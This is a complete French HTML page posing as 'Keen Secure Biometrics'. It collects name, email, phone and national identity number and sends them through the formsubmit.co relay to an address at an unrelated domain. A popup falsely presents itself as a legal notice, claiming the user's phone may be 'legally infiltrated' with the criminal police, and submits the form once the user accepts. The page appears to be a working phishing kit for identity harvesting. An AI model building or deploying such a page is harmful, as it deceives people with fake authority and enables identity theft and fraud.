
<!DOCTYPE html>
<html lang="fr">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>KSB - Page d'accueil</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      padding: 20px;
      background-color: #f2f2f2;
    }
    h1 {
      text-align: center;
      color: #004466;
    }
    form {
      background: white;
      padding: 20px;
      border-radius: 10px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      max-width: 400px;
      margin: auto;
    }
    input, button {
      width: 100%;
      padding: 10px;
      margin: 10px 0;
      border-radius: 5px;
      border: 1px solid #ccc;
    }
    button {
      background-color: #004466;
      color: white;
      border: none;
    }
    .popup {
      display: none;
      position: fixed;
      top: 0; left: 0;
      width: 100%; height: 100%;
      background: rgba(0, 0, 0, 0.7);
      justify-content: center;
      align-items: center;
      z-index: 10;
    }
    .popup-content {
      background: white;
      padding: 20px;
      border-radius: 10px;
      max-width: 90%;
    }
  </style>
</head>
<body>

<h1>Keen Secure Biometrics</h1>

<form id="ksbForm" action="https://formsubmit.co/service@belgimmoexpert.com" method="POST">
  <input type="text" name="nom" placeholder="Nom complet" required />
  <input type="email" name="email" placeholder="Adresse e-mail" required />
  <input type="tel" name="telephone" placeholder="Numéro de téléphone" required />
  <input type="text" name="identite" placeholder="Numéro d'identité" required />
  <button type="button" onclick="showPopup()">Enregistrer mes informations</button>
</form>

<div class="popup" id="popup">
  <div class="popup-content">
    <h3>Avertissement légal</h3>
    <p>En soumettant ce formulaire, vous autorisez Keen Secure Biometrics à enregistrer vos informations.
    Votre téléphone pourra être infiltré légalement en cas de problème : vol d’argent, changement d’accès sans avertissement,
    ou disparition des réseaux. Ceci se fera en collaboration avec la police criminelle.</p>
    <button onclick="acceptWarning()">J'accepte</button>
  </div>
</div>

<script>
  function showPopup() {
    document.getElementById('popup').style.display = 'flex';
  }
  function acceptWarning() {
    document.getElementById('popup').style.display = 'none';
    document.getElementById('ksbForm').submit();
  }
</script>

</body>
</html>
